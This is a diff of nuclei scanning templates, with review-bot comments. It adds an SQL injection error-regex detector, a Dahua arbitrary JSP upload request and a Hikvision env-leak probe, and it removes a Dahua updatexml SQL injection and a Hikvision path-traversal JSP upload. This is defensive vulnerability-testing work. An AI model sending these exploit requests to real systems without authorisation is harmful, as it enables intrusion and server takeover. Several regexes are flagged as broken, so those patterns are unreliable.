- "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - 
"com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/sql_injection/mass-sqli.yaml b/poc/sql_injection/mass-sqli.yaml new file mode 100644 index 0000000000..d41cf43580 --- /dev/null +++ b/poc/sql_injection/mass-sqli.yaml 
@@ -0,0 +1,476 @@ +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli,generic,error + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - 
"Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - 
"Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + 
- "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - 
"com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
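Review bot: Several extractor regexes silently diverge from the matcher regexes above them, so engine attribution is wrong or dead even when the matcher fires: the MySQL extractor's `SQLSTATE[\\d+]: Syntax error or access violation` is a one-character class (a digit or `+`) rather than the bracketed state the matcher escapes as `SQLSTATE\\[\\d+\\]:`, and the FrontBase extractor's `(Semantic|Syntax) error \\[1-4\\]\\d{2}\\.` demands a literal `[1-4]` where the matcher uses the range `[1-4]\\d{2}`. The Mckoi lists (matcher and extractor) still carry the placeholder `"<REGEX_LITERAL>"`, which can never match real output and looks like a generator artifact; drop it or substitute the intended pattern. The extractor name `Drizzel` should read `Drizzle`. This file appears to be a copy of the mass-sqli.yaml hunk immediately above it; keeping two copies means these regex fixes will drift unless one is removed.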
@@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - 
type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml 
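Review bot: The check `contains(body_1, "success")` also matches a rejected upload whose body carries `"success":false` or an error message containing the word, and nothing verifies that `Test.jsp` is actually reachable, even though the trailing comment `# /publishingImg/VIDEO/230812152005170200.jsp` records where the file is expected to land; tighten the match to the exact token the service returns (for example `contains(body_1, "\"success\":true")`, to be confirmed against a real response) and, if the path is returned in the body, extract it and follow with a GET that checks the body is `Test`. The raw request hard-codes `Content-Length: 804`, which does not match the multipart body that follows; nuclei normally recomputes the length unless `unsafe` is set, but the stale literal should be removed rather than relied on. `id: Dahua` is not a unique template id and should name the vulnerability, e.g. `id: dahua-smart-park-video-file-upload`. The description should also state that the test leaves an uploaded file on the target that the template does not clean up.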
@@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + 
- type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/web/jboss-web-console.yaml b/poc/web/jboss-web-console.yaml old mode 100755 new mode 100644 index 8333db7f7b..87264c77fe --- a/poc/web/jboss-web-console.yaml +++ b/poc/web/jboss-web-console.yaml @@ -1,30 +1,22 @@ id: jboss-web-console info: name: JBoss Management Console Server Information - author: - - l0ne1y - description: |- - JBoss管理控制台服务器信息泄露漏洞 - 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + author: dhiyaneshDK severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - https://jbossweb.jboss.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + reference: + - https://www.exploit-db.com/ghdb/5215 + tags: jboss,unauth requests: -- matchers: - - type: word - condition: and - words: - - Application Server - - Management Console - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/web-console/ServerInfo.jsp' - method: GET + - method: GET + path: + - "{{BaseURL}}/web-console/ServerInfo.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Application Server" + - "Management Console" + condition: and + - type: status + status: + - 200
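Review bot: `author: zerZero Trust Security Attack and Defense Laboratoryo` is a mangled edit of the previous value and should read `author: Zero Trust Security Attack and Defense Laboratory`. The template now probes `/artemis-portal/artemis/env` for information leakage, yet it keeps `id: HiKVISION` and lives in a file named `Hikvision_iVMS-8700_Fileupload_report.yaml`, so anyone searching by id or filename will believe it still tests the report upload; rename both to something like `hikvision-artemis-env-exposure`. Matching only the word `profiles` together with a 200 status will fire on any HTML page that mentions profiles; if this is a Spring Boot actuator-style endpoint (to be confirmed), also require a second distinctive token such as `propertySources` or a JSON content-type header. Because such `env` output commonly contains datasource credentials and keys, the description should tell operators to treat the matched body as sensitive.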